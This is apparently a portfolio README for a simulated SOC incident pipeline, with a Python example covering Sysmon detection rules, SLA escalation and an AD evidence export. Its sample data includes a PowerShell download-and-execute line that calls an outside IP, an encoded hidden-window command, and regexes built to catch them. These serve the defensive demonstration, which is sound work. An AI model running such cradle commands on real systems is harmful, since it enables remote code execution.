IT Ops Incident Workflow Simulation
Overview
This project demonstrates a full incident workflow simulation designed to mirror real SOC operations. Using Splunk, Jira, and PowerShell, I built an end-to-end pipeline that detects malicious activity, creates incidents, enforces SLAs, and exports evidence, the way a Security Engineer or SOC Analyst would in an enterprise environment.
Key Features
Detection (Splunk): Ingested Sysmon logs and triggered alerts on suspicious PowerShell activity.
Triage (Jira): Auto/manual ticket creation with SLA timers and priority escalation.
SLA Enforcement: Escalation rules activate when SLA targets are breached.
Evidence (PowerShell): Automated Active Directory change log export, attached to Jira tickets.
Workflow Diagram: Visual representation of detection → ticketing → SLA → escalation → evidence.
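The five features above form one pipeline, so here is a single offline simulation of it as an added example; it is not the project's own scripts (which are PowerShell) and it talks to none of Splunk, Jira or Active Directory. Constructed Sysmon Event ID 1 records are run through regex rules that stand in for the Splunk saved searches, each hit becomes a Jira-style ticket whose SLA clock starts at creation, a sweep escalates breached tickets to a tier-2 on-call (bumping priority one level, capped at Critical), and a filtered AD change export is recorded as the ticket's evidence attachment. The rule patterns, SLA hours, priority ladder, escalation policy, queue names, sample events and AD change records are all assumptions made for the example.

```python
"""Offline simulation of detect -> ticket -> SLA -> escalate -> evidence; all data below is constructed."""
import csv
import io
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

PRIORITY_ORDER = ["Low", "Medium", "High", "Critical"]
SLA_HOURS = {"Low": 24, "Medium": 8, "High": 4, "Critical": 1}  # assumed resolution targets, in hours

# Rules over the Sysmon Event ID 1 CommandLine field, standing in for the Splunk saved searches.
RULES = [
    ("PowerShell download cradle", re.compile(r"(?i)DownloadString|DownloadFile|IEX\s*\("), "Critical"),
    ("PowerShell encoded command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\b"), "High"),
    ("PowerShell hidden window or no profile", re.compile(r"(?i)\s-(w\s+hidden|windowstyle\s+hidden|nop\b)"), "Medium"),
]

T0 = datetime(2024, 1, 15, 9, 0)  # constructed incident time
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed Sysmon process-creation events (Splunk Sysmon add-on field names); the second is benign.
SAMPLE_EVENTS = [
    {"EventCode": 1, "Computer": "WS01", "User": "CORP\\jdoe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"EventCode": 1, "Computer": "SRV01", "User": "CORP\\svc_backup", "Image": PS,
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"EventCode": 1, "Computer": "WS02", "User": "CORP\\asmith", "Image": PS,
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
]

# Constructed AD change records; only the first is inside the one-hour window AND made by the affected user.
SAMPLE_AD_CHANGES = [
    {"When": T0 - timedelta(minutes=20), "Operation": "Modify", "By": "CORP\\jdoe",
     "Object": "CN=Domain Admins,CN=Users,DC=corp,DC=local", "Changed": "member: +CN=jdoe"},
    {"When": T0 - timedelta(days=2), "Operation": "Modify", "By": "CORP\\jdoe",
     "Object": "CN=jdoe,CN=Users,DC=corp,DC=local", "Changed": "pwdLastSet"},
    {"When": T0 - timedelta(minutes=5), "Operation": "Create", "By": "CORP\\admin1",
     "Object": "CN=svc_new,CN=Users,DC=corp,DC=local", "Changed": "objectClass: user"},
]

@dataclass
class Ticket:
    key: str
    rule: str
    priority: str
    user: str
    opened: datetime
    assignee: str = "tier1-queue"
    escalated: bool = False
    attachments: list = field(default_factory=list)

    def sla_deadline(self):
        return self.opened + timedelta(hours=SLA_HOURS[self.priority])

def detect(events):
    """One hit per PowerShell process event, at the highest priority among the rules that match."""
    hits = []
    for ev in (e for e in events if e["EventCode"] == 1 and e["Image"].lower().endswith("\\powershell.exe")):
        matched = [(name, prio) for name, rx, prio in RULES if rx.search(ev["CommandLine"])]
        if matched:
            hits.append((ev,) + max(matched, key=lambda m: PRIORITY_ORDER.index(m[1])))
    return hits

def open_tickets(hits, now):
    """Turn detections into Jira-style tickets; the SLA clock starts at `now`."""
    return [Ticket(key=f"SOC-{i}", rule=rule, priority=prio, user=ev["User"], opened=now)
            for i, (ev, rule, prio) in enumerate(hits, start=1)]

def enforce_sla(tickets, now):
    """Escalate tickets past their deadline: bump priority one level (capped) and reassign to tier 2."""
    escalated = []
    for t in tickets:
        if not t.escalated and now > t.sla_deadline():
            t.priority = PRIORITY_ORDER[min(PRIORITY_ORDER.index(t.priority) + 1, len(PRIORITY_ORDER) - 1)]
            t.assignee, t.escalated = "tier2-oncall", True
            escalated.append(t)
    return escalated

def export_ad_changes(changes, user, start, end):
    """CSV of AD changes made by `user` inside [start, end]: the artifact attached as evidence."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=["When", "Operation", "By", "Object", "Changed"])
    w.writeheader()
    for c in changes:
        if start <= c["When"] <= end and c["By"] == user:
            w.writerow({**c, "When": c["When"].isoformat()})
    return buf.getvalue()

def run_simulation(now=T0):
    """Detect, open tickets, sweep SLAs at +2h and +5h, then attach each ticket's AD evidence."""
    tickets = open_tickets(detect(SAMPLE_EVENTS), now)
    for hours in (2, 5):
        enforce_sla(tickets, now + timedelta(hours=hours))
    for t in tickets:
        report = export_ad_changes(SAMPLE_AD_CHANGES, t.user, now - timedelta(hours=1), now)
        t.attachments.append({"filename": f"{t.key}_ad_changes.csv", "rows": report.count("\r\n") - 1})
    return tickets
```

Calling run_simulation() yields two tickets: SOC-1 (encoded command, opened High) and SOC-2 (download cradle, opened Critical). The 2-hour sweep breaches only SOC-2's 1-hour target; the 5-hour sweep then breaches SOC-1's 4-hour target and bumps it to Critical. A ticket is escalated only once, which is the guard a real escalation rule needs so that every later sweep does not re-fire, and the benign `-File` event never produces a ticket because none of the rules match it. The evidence step attaches one AD change row for jdoe and none for asmith.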
Why It Matters
In real-world SOCs, analysts don't just spot alerts; they manage the entire incident lifecycle:
Configuring SIEM detections to spot malicious behavior.
Tracking and prioritizing incidents with SLAs.
Handling escalations when issues aren't resolved in time.
Collecting evidence for compliance and audit.
This project shows I can design, document, and execute these workflows using free tools, proving hands-on skills that map directly to SOC Analyst and Security Engineer roles.
Project Resources
Workflow Diagram included in README
Setup Instructions for reproducibility
Scripts & sample artifacts included